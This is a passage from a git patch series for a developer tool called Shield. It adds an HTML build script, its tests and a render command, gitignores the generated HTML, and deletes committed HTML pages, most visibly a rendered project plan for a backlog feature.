+#     OUTPUT_DIR defaults to <repo-root>/docs/shield
+set -euo pipefail
+
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+
+OUTPUT_DIR="${1:-}"
+if [[ -z "$OUTPUT_DIR" ]]; then
+  ROOT="$(git rev-parse --show-toplevel 2>/dev/null || pwd)"
+  OUTPUT_DIR="$ROOT/docs/shield"
+fi
+
+if [[ ! -d "$OUTPUT_DIR" ]]; then
+  echo "render-output: not a dir: $OUTPUT_DIR" >&2
+  exit 2
+fi
+
+python3 "$SCRIPT_DIR/rerender_all.py" --output-dir "$OUTPUT_DIR"
+python3 "$SCRIPT_DIR/write_shield_assets.py" --output-dir "$OUTPUT_DIR"
+echo "render-output: site built at $OUTPUT_DIR"
diff --git a/shield/scripts/test_render_output.py b/shield/scripts/test_render_output.py
new file mode 100644
index 00000000..a62b4344
--- /dev/null
+++ b/shield/scripts/test_render_output.py
@@ -0,0 +1,34 @@
+"""Eval for render-output.sh — the full build: pages + dashboard assets."""
+from __future__ import annotations
+
+import json
+import subprocess
+from pathlib import Path
+
+SCRIPT = Path(__file__).resolve().parent / "render-output.sh"
+
+
+def test_build_produces_pages_and_assets(tmp_path):
+    feat = tmp_path / "feat-x"
+    feat.mkdir(parents=True)
+    (tmp_path / "manifest.json").write_text(
+        json.dumps({"schema_version": "2.1", "features": [{"name": "feat-x"}]})
+    )
+    (feat / "prd.md").write_text("# PRD\n\nbody\n")
+
+    res = subprocess.run([str(SCRIPT), str(tmp_path)], capture_output=True, text=True)
+    assert res.returncode == 0, res.stderr
+
+    # pages
+    assert (feat / "outputs" / "prd.html").is_file()
+    # dashboard + shared assets
+    for asset in ["manifest.js", "index.html", "shield.css",
+                  "shield-nav.js", "shield-dashboard.js"]:
+        assert (tmp_path / asset).is_file(), f"missing asset {asset}"
+
+
+def test_missing_dir_errors(tmp_path):
+    res = subprocess.run([str(SCRIPT), str(tmp_path / "nope")],
+                         capture_output=True, text=True)
+    assert res.returncode == 2
+    assert "not a dir" in res.stderr

From af977e135117e7d160e1518be33bad164b0a9a61 Mon Sep 17 00:00:00 2001
From: ashwinimanoj <ashwinimanoj@gmail.com>
Date: Mon, 8 Jun 2026 08:26:05 +0000
Subject: [PATCH 05/10] feat(shield): /shield render command triggers
 render-output.sh

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 shield/commands/render.md | 37 +++++++++++++++++++++++++++++++++++++
 1 file changed, 37 insertions(+)
 create mode 100644 shield/commands/render.md

diff --git a/shield/commands/render.md b/shield/commands/render.md
new file mode 100644
index 00000000..9b4800cd
--- /dev/null
+++ b/shield/commands/render.md
@@ -0,0 +1,37 @@
+---
+name: render
+description: Build the browsable Shield HTML site locally from committed Markdown
+args: "[output dir — optional, defaults to docs/shield]"
+---
+
+# Render Shield Output
+
+Shield commits Markdown + JSON sidecars only. HTML (per-artifact pages and the
+browsable dashboard) is a **local build artifact** — gitignored and regenerated
+on demand. Run this command to (re)build the site, then open the HTML locally.
+
+## Usage
+
+`/shield render` — rebuild the whole site under `docs/shield/`
+`/shield render <output dir>` — rebuild a site rooted at a custom dir
+
+## Behavior
+
+1. Run the build script, which renders every source `.md` to its
+   `outputs/*.html` and then writes the dashboard (`index.html`) and shared
+   assets (`manifest.js`, CSS, nav JS):
+
+   ```bash
+   "$CLAUDE_PLUGIN_ROOT/scripts/render-output.sh" "$ARGUMENTS"
+   ```
+
+   (`$ARGUMENTS` is empty for the default `docs/shield/` location.)
+
+2. Report the built site path and remind the user the output is gitignored —
+   open `docs/shield/index.html` in a browser to view.
+
+## Important
+
+- This command does NOT author or modify any Markdown — it only renders.
+- HTML is never committed; do not `git add` anything under `outputs/` or the
+  generated root assets.

From 9f71371585e5ac1910ed711506ebe6352e18196a Mon Sep 17 00:00:00 2001
From: ashwinimanoj <ashwinimanoj@gmail.com>
Date: Mon, 8 Jun 2026 08:27:16 +0000
Subject: [PATCH 06/10] build(shield): gitignore HTML build artifacts; untrack
 committed HTML

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 .gitignore                                    |  11 +
 .../shield/backlog-20260527/outputs/plan.html | 221 -----
 docs/shield/backlog-20260527/outputs/prd.html | 392 --------
 .../plan/2026-05-27/detailed/agile-coach.html | 308 -------
 .../2026-05-27/detailed/backend-engineer.html | 113 ---
 .../plan/2026-05-27/detailed/dx-engineer.html | 172 ----
 .../2026-05-27/detailed/product-manager.html  | 196 ----
 .../detailed/security-engineer.html           | 176 ----
 .../reviews/plan/2026-05-27/detailed/sre.html | 129 ---
 .../plan/2026-05-27/enhanced-plan.html        | 274 ------
 .../reviews/plan/2026-05-27/summary.html      | 235 -----
 .../plan/2026-05-29/detailed/agile-coach.html | 133 ---
 .../2026-05-29/detailed/backend-engineer.html |  99 ---
 .../plan/2026-05-29/detailed/dx-engineer.html | 159 ----
 .../2026-05-29/detailed/product-manager.html  | 109 ---
 .../detailed/security-engineer.html           | 170 ----
 .../reviews/plan/2026-05-29/detailed/sre.html | 145 ---
 .../plan/2026-05-29/enhanced-plan.html        | 207 -----
 .../reviews/plan/2026-05-29/summary.html      | 206 -----
 .../reviews/prd/2026-05-27/enhanced-prd.html  | 316 -------
 .../reviews/prd/2026-05-27/summary.html       | 241 -----
 .../prd/2026-05-27_2/enhanced-prd.html        | 364 --------
 .../reviews/prd/2026-05-27_2/summary.html     | 203 -----
 docs/shield/backlog-20260527/outputs/trd.html | 531 -----------
 .../outputs/research.html                     | 324 -------
 docs/shield/index.html                        |  33 -
 docs/shield/manifest.js                       | 161 ----
 .../outputs/plan-architecture.html            | 162 ----
 .../outputs/plan.html                         | 430 ---------
 .../outputs/research.html                     | 837 ------------------
 .../plan/2026-05-25/detailed/agile-coach.html | 165 ----
 .../plan/2026-05-25/detailed/architect.html   | 149 ----
 .../2026-05-25/detailed/backend-engineer.html | 165 ----
 .../plan/2026-05-25/detailed/dx-engineer.html | 216 -----
 .../reviews/plan/2026-05-25/detailed/sre.html | 148 ----
 .../plan/2026-05-25/enhanced-plan.html        | 396 ---------
 .../reviews/plan/2026-05-25/summary.html      | 411 ---------
 docs/shield/shield-dashboard.js               |  62 --
 docs/shield/shield-nav.js                     | 160 ----
 docs/shield/shield.css                        |  81 --
 .../scripts/test_gitignore_html_artifacts.py  |  29 +
 41 files changed, 40 insertions(+), 8999 deletions(-)
 delete mode 100644 docs/shield/backlog-20260527/outputs/plan.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/prd.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/agile-coach.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/backend-engineer.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/dx-engineer.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/product-manager.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/security-engineer.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/sre.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/enhanced-plan.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/summary.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/agile-coach.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/backend-engineer.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/dx-engineer.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/product-manager.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/security-engineer.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/sre.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/enhanced-plan.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/summary.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27/enhanced-prd.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27/summary.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27_2/enhanced-prd.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27_2/summary.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/trd.html
 delete mode 100644 docs/shield/devcontainer-implement-20260518/outputs/research.html
 delete mode 100644 docs/shield/index.html
 delete mode 100644 docs/shield/manifest.js
 delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/plan-architecture.html
 delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/plan.html
 delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/research.html
 delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/agile-coach.html
 delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/architect.html
 delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/backend-engineer.html
 delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/dx-engineer.html
 delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/sre.html
 delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/enhanced-plan.html
 delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/summary.html
 delete mode 100644 docs/shield/shield-dashboard.js
 delete mode 100644 docs/shield/shield-nav.js
 delete mode 100644 docs/shield/shield.css
 create mode 100644 shield/scripts/test_gitignore_html_artifacts.py

diff --git a/.gitignore b/.gitignore
index b091540e..c8a5a65a 100644
--- a/.gitignore
+++ b/.gitignore
@@ -41,3 +41,14 @@ shield/tests/output/
 # outputs/, and reviews/ (see docs/superpowers/plans/2026-05-22-shield-output-
 # structure-cutover.md). Only the hidden Q&A scratch transcript is disposable.
 **/docs/shield/*/.session-transcript.md
+
+# Shield HTML is a BUILD ARTIFACT, not a source. Markdown + JSON sidecars are
+# the committed source of truth. Regenerate the site locally with /shield
+# render (scripts/render-output.sh). See docs/superpowers/specs/
+# 2026-06-08-shield-single-canonical-output-design.md
+**/docs/shield/*/outputs/
+**/docs/shield/index.html
+**/docs/shield/manifest.js
+**/docs/shield/shield.css
+**/docs/shield/shield-nav.js
+**/docs/shield/shield-dashboard.js
diff --git a/docs/shield/backlog-20260527/outputs/plan.html b/docs/shield/backlog-20260527/outputs/plan.html
deleted file mode 100644
index 57e67c4b..00000000
--- a/docs/shield/backlog-20260527/outputs/plan.html
+++ /dev/null
@@ -1,221 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8" />
-<meta name="viewport" content="width=device-width, initial-scale=1.0" />
-<title>Plan — backlog-20260527</title>
-<link rel="stylesheet" href="../../shield.css" />
-<script defer src="../../manifest.js"></script>
-<script defer src="../../shield-nav.js"></script>
-<script type="module">
-  import mermaid from "https://cdn.jsdelivr.net/npm/mermaid@10/dist/mermaid.esm.min.mjs";
-  mermaid.initialize({ startOnLoad: false, theme: "default" });
-  document.addEventListener("DOMContentLoaded", () => mermaid.run({ querySelector: "pre.mermaid" }));
-</script>
-</head>
-<body data-shield-root="../../">
-<header class="shield-header">
-  <a class="brand" href="../../index.html">🛡 Shield</a>
-  <span class="bar-sep">|</span>
-  <nav class="crumb" id="shield-crumb"></nav>
-  <span class="bar-spacer"></span>
-  <div class="feat-wrap">
-    <button class="feat-btn" id="docs-toggle" aria-expanded="false">Features ▾</button>
-    <div class="feat-panel" id="docs-panel">
-      <input class="docs-search" id="docs-search" placeholder="Search docs…  (⌘K)" autocomplete="off" />
-      <div id="docs-results"></div>
-    </div>
-  </div>
-</header>
-<main class="shield-main">
-
-<nav class="toc">
-<div class="toc-title">Contents</div>
-<ul>
-<li><a href="#milestones">Milestones</a>
-</li>
-<li><a href="#epic-1--store-schema--capture--m1">EPIC-1 — Store, schema &amp; capture  (M1)</a>
-<ul>
-<li><a href="#epic-1-s1--define-backlogjson-schema-and-validator-high">EPIC-1-S1 · Define backlog.json schema and validator (high)</a></li>
-<li><a href="#epic-1-s2--capture-entrypoint-user--skill-with-atomic-write-high">EPIC-1-S2 · Capture entrypoint (user + skill) with atomic write (high)</a></li>
-<li><a href="#epic-1-s3--backlog-view--ordered-list-high">EPIC-1-S3 · /backlog view — ordered list (high)</a></li>
-<li><a href="#epic-1-s4--manual-remove-from-backlog-medium">EPIC-1-S4 · Manual remove from /backlog (medium)</a></li>
-</ul>
-</li>
-<li><a href="#epic-2--association--pipeline-status">EPIC-2 — Association &amp; pipeline status</a>
-<ul>
-<li><a href="#epic-2-s1--per-entry-pipeline-status-from-manifestjson-high-m1">EPIC-2-S1 · Per-entry pipeline status from manifest.json (high, M1)</a></li>
-<li><a href="#epic-2-s2--feature--epic-association--agent-suggestion-high-m2">EPIC-2-S2 · Feature + epic association + agent suggestion (high, M2)</a></li>
-</ul>
-</li>
-<li><a href="#epic-3--promotion--reconciliation--m3">EPIC-3 — Promotion &amp; reconciliation  (M3)</a>
-<ul>
-<li><a href="#epic-3-s1--user-driven-promotion-with-transient-reference-high">EPIC-3-S1 · User-driven promotion with transient reference (high)</a></li>
-<li><a href="#epic-3-s2--reconciliation-engine-match-key--never-remove-on-doubt-high">EPIC-3-S2 · Reconciliation engine (match key + never-remove-on-doubt) (high)</a></li>
-<li><a href="#epic-3-s3--eager--lazy-removal-triggers-idempotent--kill-switch-high">EPIC-3-S3 · Eager + lazy removal triggers (idempotent) + kill switch (high)</a></li>
-</ul>
-</li>
-<li><a href="#epic-4--eval-coverage--release--m3">EPIC-4 — Eval coverage &amp; release  (M3)</a>
-<ul>
-<li><a href="#epic-4-s1--executable-evals-for-the-backlog-lifecycle-redgreen-high">EPIC-4-S1 · Executable evals for the backlog lifecycle (RED→GREEN) (high)</a></li>
-<li><a href="#epic-4-s2--version-bump--commandskill-docs-medium">EPIC-4-S2 · Version bump + command/skill docs (medium)</a></li>
-</ul>
-</li>
-<li><a href="#validate-the-bet-from-v1-data--p1--pm10-decided-2026-05-27">Validate the bet from v1 data  (P1 — PM10, decided 2026-05-27)</a>
-</li>
-<li><a href="#carried-forward-from-prd-review-ready-run-_2">Carried forward from PRD-review (Ready, run _2)</a>
-</li>
-<li><a href="#next-steps">Next steps</a>
-</li>
-</ul>
-</nav>
-<!-- sidecar: ./plan.json -->
-<h1 id="plan--shield-backlog">Plan — Shield Backlog</h1>
-<p><strong>Project:</strong> Shield · <strong>Phase:</strong> v1 · <strong>Domain:</strong> backend (Python)
-<strong>PRD:</strong> <a href="../prd.md"><code>./prd.md</code></a> (reviewed <strong>Ready</strong>, composite 3.12) · <strong>TRD:</strong> <a href="../trd.md"><code>./trd.md</code></a> · <strong>Sidecar:</strong> <code>./plan.json</code></p>
-<p>A project-level Shield backlog: capture (user/agent) → user-driven promotion → reconciliation. Entries are removed when their work commits — eagerly at the end of a promoted <code>/plan</code> or <code>/implement</code> run, lazily on the <code>/backlog</code> view sweep, or manually. Matching is by feature (<code>manifest.json</code> index) + epic (<code>plan.json</code> gate); no ids are stamped. This re-plan folds the 2026-05-27 plan-review findings (P0 gate-0d, the P1/P2 set) into the stories and adds the previously-deferred 14-section TRD plus three component LLD drafts.</p>
-<h2 id="milestones">Milestones</h2>
-<table>
-<thead>
-<tr>
-<th>ID</th>
-<th>Name</th>
-<th>Depends on</th>
-<th>Touches LLD</th>
-<th>Outcome</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>M1</td>
-<td>Capture + store + view</td>
-<td>—</td>
-<td><code>backlog-store</code></td>
-<td><code>backlog.json</code> + schema/validator; capture (user + skill, atomic, validate-or-refuse); <code>/backlog</code> ordered view with manifest status badges; manual remove.</td>
-</tr>
-<tr>
-<td>M2</td>
-<td>Feature + epic association + suggestion</td>
-<td>M1</td>
-<td><code>epic-suggester</code></td>
-<td>Every entry carries feature + epic (existing or proposed-new); agent suggests via exact-normalized match; user accept/replace/create-new.</td>
-</tr>
-<tr>
-<td>M3</td>
-<td>Promotion + reconciliation</td>
-<td>M2</td>
-<td><code>reconciler</code></td>
-<td>Promotion via transient reference; reconciliation engine (single &quot;epic landed&quot; predicate matching by epic <strong>name</strong>, never-remove-on-doubt, drift tolerance, removal logging); eager + lazy idempotent triggers + kill switch (incl. <code>shield.schema.json</code> <code>backlog</code> key); eval suite + version bump.</td>
-</tr>
-</tbody>
-</table>
-<p>LLD drafts emitted by this plan (feature-folder, net-new): <a href="../lld-backlog-store.md"><code>lld-backlog-store.md</code></a>, <a href="../lld-epic-suggester.md"><code>lld-epic-suggester.md</code></a>, <a href="../lld-reconciler.md"><code>lld-reconciler.md</code></a>.</p>
-<hr />
-<h2 id="epic-1--store-schema--capture--m1">EPIC-1 — Store, schema &amp; capture  <em>(M1)</em></h2>
-<h3 id="epic-1-s1--define-backlogjson-schema-and-validator-high">EPIC-1-S1 · Define backlog.json schema and validator <em>(high)</em></h3>
-<p>Define <code>backlog.json</code> shape + JSON Schema with a top-level <code>schema_version</code>, plus a Python validator. Entry: <code>{id, order:int, kind∈{epic,story,task}, source∈{user,agent}, feature, epic, text}</code>. <code>schema_version</code> is set now so future shape changes migrate read-old/write-new.</p>
-<ul>
-<li><strong>Tasks:</strong> author <code>shield/schema/backlog.schema.json</code>; specify the <code>id</code> contract (<code>uuid4</code> string; uniqueness across <code>entries[]</code> enforced by the <strong>validator</strong>, not the JSON Schema — P1-2 — since draft 2020-12 can't express property-level array uniqueness); document entry shape, migration policy, and the <strong><code>manifest features[].name</code> == folder-slug</strong> invariant (P1-3) in <code>shield/skills/general/backlog/SKILL.md</code>; create <code>shield/scripts/validate_backlog.py</code>; ordering = single integer <code>order</code>; migration is doc-only until <code>schema_version</code> 2.</li>
-<li><strong>AC:</strong> schema rejects unknown <code>kind</code> (named error); <strong>the validator</strong> rejects duplicate <code>id</code> values (<code>duplicate_entry_id</code>); <code>validate_backlog.py</code> exits 0/non-zero correctly; <code>schema_version</code> + migration policy + name==slug invariant documented; enums constrained; <code>id</code> is a <code>uuid4</code> string.</li>
-<li><strong>Design:</strong> <a href="../trd.md#apis-involved">§11 APIs Involved</a> · LLD <a href="../lld-backlog-store.md#data-model"><code>backlog-store</code> §4 Data model</a></li>
-</ul>
-<h3 id="epic-1-s2--capture-entrypoint-user--skill-with-atomic-write-high">EPIC-1-S2 · Capture entrypoint (user + skill) with atomic write <em>(high)</em></h3>
-<p>Capture usable by the user (<code>/backlog add</code>) and any skill (documented <code>capture()</code> write helper). Atomic temp-then-rename + validate-or-refuse so concurrent capture vs reconciliation can't corrupt the file. <em>Resolves PRD-review P1 (capture interface); closes TRD §12 Q3.</em></p>
-<ul>
-<li><strong>Tasks:</strong> <code>/backlog add</code> (assigns next <code>order</code> + <code>uuid4</code> id); <strong>LOCKED</strong> write-helper signature <code>capture(text: str, *, kind: str = &quot;task&quot;, feature: str | None = None, epic: str | None = None, source: str) -&gt; str</code> in <code>shield/scripts/backlog_store.py</code>, raising <code>BacklogInvalid</code> (pinned TRD §11); <strong>LOCKED</strong> single-writer (no lock) → full doc → <code>.tmp</code> → <code>os.replace()</code> (TRD §6 N1); <strong>+ compare-before-replace</strong> (P1-1/security): refuse <code>os.replace()</code> if the on-disk store changed since read → loud <code>BacklogInvalid</code>, no lost entry; <strong>package <code>backlog_store</code></strong> with a <code>pyproject.toml</code> (P1-4 — skills import <code>capture()</code>); validate-or-refuse on read <strong>and</strong> write.</li>
-<li><strong>AC:</strong> user + skill capture both work; interface documented + pinned in TRD §11; mid-write kill leaves no corruption; <strong>a concurrent on-disk change between read and replace is refused with <code>BacklogInvalid</code> (no lost entry)</strong>; next <code>order</code>/<code>uuid4</code> id/default <code>kind</code> assigned; malformed/partial <code>backlog.json</code> on read is <strong>refused with <code>BacklogInvalid</code></strong>, never silently read or truncated.</li>
-<li><strong>Design:</strong> <a href="../trd.md#functional-requirements">§5 Functional Requirements</a> · LLD <a href="../lld-backlog-store.md#api-contracts"><code>backlog-store</code> §5 API contracts</a></li>
-</ul>
-<h3 id="epic-1-s3--backlog-view--ordered-list-high">EPIC-1-S3 · /backlog view — ordered list <em>(high)</em></h3>
-<p><code>/backlog</code> command + skill rendering entries sorted by <code>order</code> with feature + epic + source.</p>
-<ul>
-<li><strong>Tasks:</strong> author <code>shield/commands/backlog.md</code> + <code>backlog/SKILL.md</code>; render sorted by <code>order</code>; define the per-entry render-line format once in the SKILL.md (canonical badge string lives in EPIC-2-S1) so every view path renders identically; document a local-dev/dry-run loop; empty-backlog message.</li>
-<li><strong>AC:</strong> ascending-<code>order</code> list with feature/epic/source; clean empty message; command registered; render-line format documented once and reused.</li>
-<li><strong>Design:</strong> <a href="../trd.md#product-journey">§4 Product Journey</a></li>
-</ul>
-<h3 id="epic-1-s4--manual-remove-from-backlog-medium">EPIC-1-S4 · Manual remove from /backlog <em>(medium)</em></h3>
-<p><code>/backlog remove &lt;id&gt;</code> — plain delete for ideas decided against / entries no run will clear.</p>
-<ul>
-<li><strong>Tasks:</strong> <code>remove &lt;id&gt;</code> via atomic helper; confirm-before-delete; clear error on absent id; document the recoverability boundary (git revert covers only committed entries; uncommitted manual remove is unrecoverable by design — N4).</li>
-<li><strong>AC:</strong> deletes + persists atomically; absent id = clear no-op error; no history retained; uncommitted-entry recoverability caveat documented.</li>
-<li><strong>Design:</strong> <a href="../trd.md#functional-requirements">§5 Functional Requirements</a> · LLD <a href="../lld-backlog-store.md#api-contracts"><code>backlog-store</code> §5 API contracts</a></li>
-</ul>
-<hr />
-<h2 id="epic-2--association--pipeline-status">EPIC-2 — Association &amp; pipeline status</h2>
-<h3 id="epic-2-s1--per-entry-pipeline-status-from-manifestjson-high-m1">EPIC-2-S1 · Per-entry pipeline status from manifest.json <em>(high, M1)</em></h3>
-<p><code>/backlog</code> view shows each entry's feature pipeline status (research/prd/plan) read live from <code>manifest.json</code> — so &quot;prd done, not yet planned&quot; is visible without removal.</p>
-<ul>
-<li><strong>Tasks:</strong> read manifest; render status badges per entry; pin the canonical badge string <code>research ✓  prd ✓  plan –</code> in the SKILL.md; <code>not started</code> when feature absent; compute at view time (no stored status).</li>
-<li><strong>AC:</strong> badges derived from manifest using the pinned string; prd-but-no-plan shows <code>prd ✓ plan –</code> and stays; absent feature → <code>not started</code>.</li>
-<li><strong>Design:</strong> <a href="../trd.md#high-level-design">§7 High-Level Design</a></li>
-</ul>
-<h3 id="epic-2-s2--feature--epic-association--agent-suggestion-high-m2">EPIC-2-S2 · Feature + epic association + agent suggestion <em>(high, M2)</em></h3>
-<p>Associate every entry with a feature (reconciliation key) + epic (removal gate), either proposed-new; agent suggests feature (manifest) + epic (plan.json); user accept/replace/create-new.</p>
-<ul>
-<li><strong>Tasks:</strong> prompt/accept feature + epic (allow proposed-new); <strong>LOCKED</strong> match key = exact normalized (<code>casefold()</code> + collapsed whitespace); <strong>UPDATED (P0-2): both existing and proposed-new epics match by exact normalized NAME</strong> (epic id <code>EPIC-N</code> is a positional within-plan slot, not a cross-plan key), no fuzzy ranking (TRD §5 F7/F8); suggestion typed against the real shapes (P0-1): <code>suggest_feature</code> reads <code>manifest.features[].name</code>, <code>suggest_epic</code> reads <code>plans[feature].epics[]</code> (plans = <code>dict[slug→plan]</code>, path derived); never block capture; a tie (≥2 matches) surfaces all and auto-picks none.</li>
-<li><strong>AC:</strong> every entry has feature + epic; ≥1 feature + ≥1 epic candidate proposed when matches exist; <code>auth</code> fixture surfaces <code>auth</code> top candidate + 2-way tie auto-picks neither; <strong>a suggested feature value resolves to an existing <code>docs/shield/&lt;value&gt;/</code> path</strong>; capture succeeds with proposed-new when none.</li>
-<li><strong>Design:</strong> <a href="../trd.md#functional-requirements">§5 Functional Requirements</a> · LLD <a href="../lld-epic-suggester.md#api-contracts"><code>epic-suggester</code> §5 API contracts</a></li>
-</ul>
-<hr />
-<h2 id="epic-3--promotion--reconciliation--m3">EPIC-3 — Promotion &amp; reconciliation  <em>(M3)</em></h2>
-<h3 id="epic-3-s1--user-driven-promotion-with-transient-reference-high">EPIC-3-S1 · User-driven promotion with transient reference <em>(high)</em></h3>
-<p><code>/backlog promote &lt;id&gt;</code> launches the user-chosen step (<code>/research</code>/<code>/prd</code>/<code>/plan</code>/<code>/implement</code>) and passes the entry id as a transient runtime reference — never stamped into <code>plan.json</code>.</p>
-<ul>
-<li><strong>Tasks:</strong> <code>promote &lt;id&gt;</code> affordance; forward id as transient reference; document non-persistence; shippable work routes through <code>/plan</code>, direct <code>/implement</code> for rare planless one-offs.</li>
-<li><strong>AC:</strong> promotion starts the chosen step + forwards the reference; reference not persisted to plan.json/stories (F6); tool never auto-routes.</li>
-<li><strong>Design:</strong> <a href="../trd.md#product-journey">§4 Product Journey</a></li>
-</ul>
-<blockquote>
-<p><strong>Intra-epic dependency:</strong> EPIC-3-S3 (triggers) consumes both EPIC-3-S1 (transient reference) and EPIC-3-S2 (engine) and must land after them.</p>
-</blockquote>
-<h3 id="epic-3-s2--reconciliation-engine-match-key--never-remove-on-doubt-high">EPIC-3-S2 · Reconciliation engine (match key + never-remove-on-doubt) <em>(high)</em></h3>
-<p>Locate feature in <code>manifest.json</code>; if it has a <code>plan.json</code>, apply the single <strong>&quot;epic landed&quot; predicate</strong> (TRD §5 F8): remove iff an epic with the matching <strong>normalized-exact name</strong> is <strong>present in <code>plan.json.epics[]</code></strong> — story <code>status</code> is never consulted. Ambiguity/no-match → entry stays. Unknown manifest/plan shapes → doubt (stays), never crash.</p>
-<ul>
-<li><strong>Tasks:</strong> <code>shield/scripts/reconcile_backlog.py</code> with <code>reconcile(entry, *, manifest: dict, plans: dict[str,dict]) -&gt; RemovalDecision</code> (pure fn; manifest = list-keyed <code>features[]</code>, <code>plans</code> = <code>{slug→plan}</code> with path <strong>derived</strong> — P0-1); <strong>UPDATED (P0-2)</strong> match key = epic by casefold+collapsed-ws exact <strong>name</strong> for both existing and proposed-new (never by positional <code>EPIC-N</code> id; a re-planned reorder must still resolve); tie/no-match → stays; story status never consulted; never-remove-on-doubt; drift tolerance with logged warning; define <code>RemovalDecision</code> + <strong>log every removal</strong> <code>{entry id, feature, epic, match-kind (name), triggering run, gating plan.json path}</code>.</li>
-<li><strong>AC:</strong> removed only when an epic with normalized-exact <strong>name</strong> is present in <code>plan.json.epics[]</code> (story status not consulted), prd-only not; <strong>a re-planned epic reorder (same name, new <code>EPIC-N</code>) still resolves</strong>; epic-name collision across two features → ambiguous → entry stays; malformed/old shapes → entry stays (logged), no exception; every removal emits the structured log line.</li>
-<li><strong>Design:</strong> <a href="../trd.md#high-level-design">§7 High-Level Design</a> · LLD <a href="../lld-reconciler.md#sequence-flows"><code>reconciler</code> §6 Sequence flows</a></li>
-</ul>
-<h3 id="epic-3-s3--eager--lazy-removal-triggers-idempotent--kill-switch-high">EPIC-3-S3 · Eager + lazy removal triggers (idempotent) + kill switch <em>(high)</em></h3>
-<p>Eager prune at end of promoted <code>/plan</code>/<code>/implement</code> (via the transient reference); lazy sweep on <code>/backlog</code> view. Both idempotent; both call the one reconciliation engine. Ships the kill switch and closes the uncommitted-state recovery gap. <em>Lands after EPIC-3-S1 + EPIC-3-S2.</em></p>
-<ul>
-<li><strong>Tasks:</strong> eager prune hook at end of <code>/plan</code> + <code>/implement</code>; lazy sweep on view; idempotent remove-if-present + shared engine; <strong>kill switch</strong> <code>.shield.json</code> <code>backlog.auto_reconcile</code> (default true) disabling eager + lazy (§14 rollback fallback) — <strong>requires an additive <code>backlog</code> object in <code>shield/schemas/shield.schema.json</code></strong> (P0-3; current schema is <code>additionalProperties:false</code>); <strong>RESOLVED (P1-1)</strong> the single recovery mechanism is append-to-<code>.shield/backlog-removed.log</code> <strong>before</strong> the destructive prune (commit-before-prune is a non-goal); no-op prune writes no log/recovery record; <strong>instrument the N2 ~1s budget</strong> with a debug-gated latency line (WARN &gt; 1s).</li>
-<li><strong>AC:</strong> promotion removes referenced entry at end of run (eager); sweep removes plan-committed entries (lazy); second pass is a no-op (idempotent); shared engine; <code>backlog.auto_reconcile=false</code> (now schema-valid) disables both, leaving manual-remove; <strong>end-of-run prune appends to <code>.shield/backlog-removed.log</code> before remove; replay restores the entry</strong>; debug latency line reports view+sweep wall time + WARN above 1s.</li>
-<li><strong>Design:</strong> <a href="../trd.md#high-level-design">§7 High-Level Design</a> · LLD <a href="../lld-reconciler.md#concurrency-and-state"><code>reconciler</code> §8 Concurrency &amp; state</a></li>
-</ul>
-<hr />
-<h2 id="epic-4--eval-coverage--release--m3">EPIC-4 — Eval coverage &amp; release  <em>(M3)</em></h2>
-<h3 id="epic-4-s1--executable-evals-for-the-backlog-lifecycle-redgreen-high">EPIC-4-S1 · Executable evals for the backlog lifecycle (RED→GREEN) <em>(high)</em></h3>
-<p>Per CLAUDE.md eval mandate: cover capture (user + skill), view + status, manual remove, eager prune, lazy sweep, match-key, never-remove-on-doubt, concurrency (no lost entry), no-stamping (F6), recovery-rehearsal.</p>
-<ul>
